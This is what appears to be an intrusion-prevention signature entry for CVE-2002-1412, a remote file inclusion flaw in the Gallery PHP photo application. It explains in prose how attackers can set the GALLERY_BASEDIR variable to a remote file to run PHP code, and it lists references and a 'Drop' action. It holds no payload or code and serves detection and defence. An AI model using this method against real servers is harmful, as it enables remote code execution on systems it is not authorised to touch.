HTTP: PHP Gallery HTTP_VARS In URL

This signature detects attempts to exploit a known vulnerability against Gallery, a Web-based photo management application. Gallery uses the variables HTTP_POST_VARS, HTTP_GET_VARS, HTTP_COOKIE_VARS, and HTTP_POST_FILES to transfer data between pages, including the GALLERY_BASEDIR variable. Attackers can manually control these variables to include a malicious setting for GALLERY_BASEDIR; enabling them to execute arbitrary PHP code on the Gallery server with the permissions of the HTTP server.

Extended Description

Gallery is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Gallery. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'GALLERY_BASEDIR' parameter.

Affected Products

Bharat_mediratta gallery

References

BugTraq: 5375

CVE: CVE-2002-1412

URL: http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=107&sid=107 http://www.securiteam.com/unixfocus/6S00H0U8KG.html http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=26325

Short Name

HTTP:PHP:GALLERY:HTTP-VARS

Severity

Major

Recommended

False

Recommended Action

Drop

HTTP: PHP Gallery HTTP_VARS In URL

Extended Description

Affected Products

References

Found a potential security threat?